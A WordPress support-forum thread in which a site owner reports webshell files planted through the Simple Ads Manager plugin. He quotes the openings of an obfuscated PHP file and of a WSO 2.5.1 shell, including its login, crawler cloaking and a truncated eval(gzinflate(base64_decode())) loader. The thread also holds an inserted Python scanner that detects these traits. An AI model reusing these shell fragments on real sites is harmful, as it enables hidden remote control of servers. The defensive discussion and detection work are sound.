Hello,

    the Wordfence plugin was complaining about a file wp-content/uploads/sam_conf.php with 3511 bytes – I checked it just now and it is really looking strange. Also because it is not present on other websites where I have SAM running. It is dated from March 10th. Checking the webserver logs I find POST and GET requests on that file from an IP based in Hong Kong (not the typical user on our website). Also someone was looking for that file earlier in the SAM plugin directory (the reason why I write here) – where no such file is.

    The file starts with:

    <?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa

    It looks like my system has been hijacked or something like this?

    Well, as a first action I moved the file away from the webspace.

    Any ideas?

    Cheers,
    Martin

    https://www.ads-software.com/plugins/simple-ads-manager/

Viewing 7 replies - 1 through 7 (of 7 total)
    Thread Starter msebald

    (@msebald)

    Ok, just found two other suspicious files:

    wp-content/plugins/simple-ads-manager/sam-config-sample.php (March 6th)
    wp-content/uploads/wp-config-sample.php (March 7th)

    As both files are not on other WP installations I run, I removed those files.

    It seems like it started with sam-config-sample.php on March 6th.

    I checked all other files on this webspace and it seems that no other files have been changed. At least the file date is older than March 6th…

    The files' content looks suspicious. wp-config-sample.php is also encoded like the first file in my first post (BTW: Where can I decode such files to see the real content?). sam-config-sample.php is not (which makes it look REALLY suspicious, even for a non-programmer, as it checks for system stuff, PHP functions and a lot more). Here are the beginnings of both files:

    wp-config-sample.php:

    <?php
    $auth_pass = "xxx";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57rut+fk/OacJKo9FIGo1Go9HIG5bX3cksvi6Xuqf7J+/3Tz7bL8/O3nXP4av79MX+0Zn9pVJh39YY/CnNIzd8OnKnccTazAlD57psvQiCke9aVWad+vNwhj/enh49C2L85TldJ+yPvSs3xM/fnOnA/Yq/TpxJz4fEyjZh9oblWeiOuhMn7o/L9qbNasybzPxg4Jbtv+2qXnUF8uxNDxNXoBn/jF1n4IZlgtps1OrsQf0BOwpidhDMpwNb0IB/3K9ezL9u1m7W1na9qdeN3Lhsu2EYhF0/GNnVo/M3b6BIkgepXcqP7GrdyJk4X7vuV7c/j71g2o29iSsgIJc+u7438eKySps4I6/f/XMexG7UDedThOG5A3foTaEz

    (I replaced the auth_pass by “xxx”.)

    sam-config-sample.php:

    <?php
    
    $auth_pass="xxx";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    
    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.5.1');
    
    if(get_magic_quotes_gpc()) {
            function WSOstripslashes($array) {
                    return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
            }
            $_POST = WSOstripslashes($_POST);
        $_COOKIE = WSOstripslashes($_COOKIE);
    }
    
    function wsoLogin() {
            die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
    }
    
    function WSOsetcookie($k, $v) {
        $_COOKIE[$k] = $v;
        setcookie($k, $v);
    }
    
    if(!empty($auth_pass)) {
        if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
            WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
    
        if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
            wsoLogin();
    }

    (I replaced the auth_pass by “xxx” here, too.)
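    The two samples above show the shapes a defender needs to recognise: the first hides its variable names behind PHP "\xNN" string escapes and aliases them through ${"GLOBALS"}, the second is a WSO shell that feeds eval(gzinflate(base64_decode(...))) through preg_replace's /e modifier, hides from search-engine crawlers and switches error logging off. The following script is an added example (my own code, not from the thread, the SAM plugin or Wordfence) that answers the "how do I decode such files" question statically: it decodes the \xNN escapes as text and matches the decoded text against those indicators without ever executing any PHP. The embedded samples are constructed to mirror the posted fragments, and the base64 blob is a placeholder.

```python
"""Static triage of suspected PHP webshells, written for the cases in this thread.

Added example; not code from the thread or from the SAM plugin. It only reads
PHP source as text: the "\\xNN" escapes PHP allows inside double-quoted strings
are decoded so that ${"\\x47LOB\\x41\\x4c\\x53"} becomes ${"GLOBALS"}, and the
decoded text is matched against the indicators visible in the posted samples.
Nothing is ever executed, so it is safe to run on a quarantined copy.
"""
import re
from pathlib import Path

_HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")


def unescape_php(text: str) -> str:
    """Turn every \\xNN escape into its character; everything else is untouched."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


# ${"GLOBALS"}["randomalias"]="real_name";  -- the aliasing trick from the first
# sample; once decoded, this table tells you what each random alias stands for.
_GLOBALS_ALIAS = re.compile(
    r'\$\{\s*"GLOBALS"\s*\}\s*\[\s*"([^"]+)"\s*\]\s*=\s*"([^"]*)"\s*;'
)


def reveal_globals_aliases(text: str) -> dict:
    """Map alias -> variable name for every completed alias assignment."""
    return dict(_GLOBALS_ALIAS.findall(unescape_php(text)))


# Each indicator is (label, regex applied to the DECODED source).
_INDICATORS = [
    ("preg_replace with /e modifier (pattern-driven eval)",
     re.compile(r"preg_replace\s*\(\s*(['\"])/.*?/\w*e\w*\1")),
    ("eval(gzinflate(base64_decode(...))) payload",
     re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode")),
    ("variable-variable access to $GLOBALS",
     re.compile(r'\$\{\s*"GLOBALS"\s*\}')),
    ("WSO webshell marker",
     re.compile(r"WSO_VERSION|wsoLogin|WSOsetcookie|'FilesMan'")),
    ("crawler cloaking (404 for search-engine user agents)",
     re.compile(r"HTTP_USER_AGENT.*?404 Not Found", re.S)),
    ("error logging switched off",
     re.compile(r"ini_set\s*\(\s*['\"](?:error_log|log_errors)['\"]")),
]


def scan_php_source(text: str) -> list:
    """Return the labels of all indicators present in the decoded source."""
    decoded = unescape_php(text)
    return [label for label, rx in _INDICATORS if rx.search(decoded)]


def scan_tree(root) -> dict:
    """Scan every *.php below root. A PHP file inside an uploads/ directory is
    reported on its own, because WordPress never needs one there."""
    report = {}
    for path in Path(root).rglob("*.php"):
        findings = scan_php_source(path.read_text(errors="replace"))
        if "uploads" in path.parts:
            findings.insert(0, "PHP file inside an uploads directory")
        if findings:
            report[str(path)] = findings
    return report


# Constructed samples mirroring the two shapes posted in the thread (the base64
# blob of the real file is replaced by a placeholder).
OBFUSCATED_SAMPLE = r'''<?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";'''

WSO_SAMPLE = r'''<?php
$auth_pass = "xxx";
$default_action = 'FilesMan';
if(preg_match('/Google|Slurp/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; }
@ini_set('error_log',NULL);
@define('WSO_VERSION', '2.5.1');
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'BASE64_BLOB_PLACEHOLDER'))", "");'''

BENIGN_SAMPLE = r'''<?php
define('DB_NAME', 'wordpress');
$table_prefix = 'wp_';
if (!defined('ABSPATH')) { define('ABSPATH', __DIR__ . '/'); }
require_once ABSPATH . 'wp-settings.php';'''

if __name__ == "__main__":
    print(reveal_globals_aliases(OBFUSCATED_SAMPLE))
    for name, sample in [("obfuscated", OBFUSCATED_SAMPLE),
                         ("wso", WSO_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, scan_php_source(sample))
```

    Run it against a copy of the webroot with scan_tree("/path/to/quarantined/copy"); every hit deserves a manual look, and the alias table from reveal_globals_aliases() makes the "GLOBALS" style of file readable so you can see which settings (auth_pass, default_use_ajax and so on) it defines before deciding whether it is the same WSO shell.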

    Plugin Author minimus

    (@minimus)

    These files are not the part of the original set of files of the SAM plugin!

    Thread Starter msebald

    (@msebald)

    Yes, I know. Interesting that they show up in this directory and under these names.

    I checked everything with Wordfence, did not find anything more than these three files. Also no other files altered.

    I just want to add my experience here — one of my client’s sites was hijacked last week, and most of the infected files seem to be in the SAM plugin folder. The WordPress install and all plugins were up to date, I believe.

    I’m seeing malicious “sam_conf.php” and “sam-config-sample.php” in the SAM plugin folder. The intruder left several malicious files on the root of the site with names like “cache.php” and “402.php”, and a few such files in /wp-admin and /wp-includes.

    I don’t know if the hack was enabled by a vulnerability in SAM, but it might be a good idea to investigate!

    Can you post an update here since you have pushed out a new version? It would be good to know what you found — now that it has been corrected.

    Thanks.

    Plugin Author minimus

    (@minimus)

    I removed unused code from the file sam-ajax-admin.php. Attackers could use this piece of code to upload files to the server.

    Thread Starter msebald

    (@msebald)

    So SAM was the reason for my problems. Good to know and thank you for digging into this and releasing a patched version.

    Did you get any further information on what happened when a website was affected by hackers?

The topic ‘wp-content/uploads/sam_conf.php’ is closed to new replies.